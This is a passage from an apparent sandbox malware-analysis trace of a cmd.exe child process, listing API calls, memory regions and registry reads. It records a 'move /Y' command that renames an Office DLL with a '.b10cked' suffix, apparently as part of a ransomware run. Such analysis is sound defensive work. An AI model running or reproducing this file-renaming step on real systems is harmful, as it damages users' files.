lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.252] SetConsoleInputExeNameW () returned 0x1 [0152.252] GetConsoleOutputCP () returned 0x1b5 [0152.252] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.252] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.252] exit (_Code=0) Process: id = "245" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" 
page_root = "0x7ea16dc0" os_pid = "0xce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20185 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20186 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20187 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20188 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 20189 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20190 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20191 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = 
mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20192 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20193 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 20194 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20228 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20229 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20230 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20231 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 20232 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 20233 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20234 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20235 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type 
= mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20236 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20237 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20238 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20239 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20240 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20241 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20242 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 20243 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20244 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 20245 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 20246 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 20247 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 20248 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20249 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 20250 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 20251 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 308 os_tid = 0xa10 [0151.992] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb44 | out: lpSystemTimeAsFileTime=0x14fb44*(dwLowDateTime=0x94872ae0, dwHighDateTime=0x1d440a9)) [0151.993] GetCurrentProcessId () returned 0xce4 [0151.993] GetCurrentThreadId () returned 0xa10 [0151.993] GetTickCount () returned 0x2eea2 [0151.993] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb3c | out: lpPerformanceCount=0x14fb3c*=20878185212) returned 1 [0151.993] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0151.993] __set_app_type (_Type=0x1) [0151.993] __p__fmode () returned 0x76b331f4 [0151.994] __p__commode () returned 0x76b331fc [0151.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0151.994] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: 
_Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0151.994] GetCurrentThreadId () returned 0xa10 [0151.994] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa10) returned 0x38 [0151.994] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0151.994] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0151.994] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.994] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0151.994] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fad4 | out: phkResult=0x14fad4*=0x0) returned 0x2 [0151.995] VirtualQuery (in: lpAddress=0x14fb0b, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.995] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14faa4, dwLength=0x1c | out: lpBuffer=0x14faa4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, 
State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0151.995] GetConsoleOutputCP () returned 0x1b5 [0151.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0151.995] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0151.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0151.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0151.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.996] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0151.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.996] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0151.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.996] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0151.996] GetEnvironmentStringsW () returned 0x220210* [0151.996] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0151.997] GetEnvironmentStringsW () returned 0x220210* [0151.997] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0151.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea44 | out: phkResult=0x14ea44*=0x40) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0xa0, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x0, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegCloseKey (hKey=0x40) returned 0x0 [0151.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea44 | out: phkResult=0x14ea44*=0x40) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: 
lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x0, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.998] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.998] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.998] RegCloseKey (hKey=0x40) returned 0x0 [0151.998] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0151.998] srand (_Seed=0x5b88637a) [0151.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" [0151.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" [0151.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0151.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) 
returned 0x1b [0151.998] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.999] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0151.999] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0151.999] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0151.999] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0151.999] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0151.999] GetEnvironmentStringsW () returned 0x222360* [0151.999] FreeEnvironmentStringsW (penv=0x222360) returned 1 [0151.999] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.999] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.999] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0151.999] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0151.999] _wcsicmp 
(_String1="KEYS", _String2="TIME") returned -9 [0151.999] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0151.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f810 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f810, lpFilePart=0x14f80c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f80c*="Desktop") returned 0x18 [0152.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.000] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.000] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.001] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.001] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.001] GetEnvironmentStringsW () returned 0x220210* [0152.001] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0152.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.002] 
GetConsoleOutputCP () returned 0x1b5 [0152.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.002] GetUserDefaultLCID () returned 0x409 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f950, cchData=128 | out: lpLCData="0") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f950, cchData=128 | out: lpLCData="0") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f950, cchData=128 | out: lpLCData="1") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.003] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.004] 
GetConsoleTitleW (in: lpConsoleTitle=0x210930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.004] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.005] _wcsicmp (_String1="move", _String2=")") returned 68 [0152.005] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0152.005] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0152.005] _wcsicmp (_String1="IF", _String2="move") returned -4 [0152.005] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0152.005] _wcsicmp (_String1="REM", _String2="move") returned 5 [0152.005] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0152.010] GetConsoleTitleW (in: lpConsoleTitle=0x14f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.156] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0152.156] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0152.156] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0152.156] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0152.156] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="CD") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="REN") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0152.156] _wcsicmp (_String1="move", _String2="SET") returned -6 [0152.156] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0152.156] _wcsicmp 
(_String1="move", _String2="TIME") returned -7 [0152.156] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="MD") returned 11 [0152.156] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0152.156] _wcsicmp (_String1="move", _String2="RD") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0152.156] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0152.157] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0152.157] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="VER") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0152.157] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0152.157] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0152.157] _wcsicmp (_String1="move", _String2="START") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0152.157] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0152.157] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0152.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.159] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.159] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f404, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f3fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f3fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 
